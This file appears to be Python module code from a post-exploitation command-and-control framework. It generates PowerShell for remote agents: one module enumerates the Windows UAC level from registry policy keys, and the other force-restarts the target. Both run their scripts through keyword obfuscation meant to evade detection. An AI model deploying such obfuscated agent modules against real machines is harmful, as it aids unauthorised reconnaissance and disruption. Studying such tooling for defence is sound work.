def generate(self, obfuscate=False, obfuscationCommand=""): script = """ function Get-UACLevel { <# .Synopsis Enumerates the UAC Level Author: Petr Medonos .DESCRIPTION Enumerates the UAC Level .EXAMPLE C:\> Get-UACLevel #> New-Variable -Name Key New-Variable -Name PromptOnSecureDesktop_Name New-Variable -Name ConsentPromptBehaviorAdmin_Name $Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" $ConsentPromptBehaviorAdmin_Name = "ConsentPromptBehaviorAdmin" $PromptOnSecureDesktop_Name = "PromptOnSecureDesktop" $ConsentPromptBehaviorAdmin_Value = (Get-ItemProperty $Key $ConsentPromptBehaviorAdmin_Name).$ConsentPromptBehaviorAdmin_Name $PromptOnSecureDesktop_Value = (Get-ItemProperty $Key $PromptOnSecureDesktop_Name).$PromptOnSecureDesktop_Name If($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){ "Never notify" } ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){ "Notify me only when apps try to make changes to my computer (do not dim my desktop)" } ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){ "Notify me only when apps try to make changes to my computer (default)" } ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){ "Always notify" } Else{ "Unknown" } } Get-UACLevel""" for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch script += " -" + str(option) else: script += " -" + str(option) + " " + str(values['Value']) script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): script = "'Restarting computer';Restart-Computer -Force" if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.keyword_obfuscation(script) return script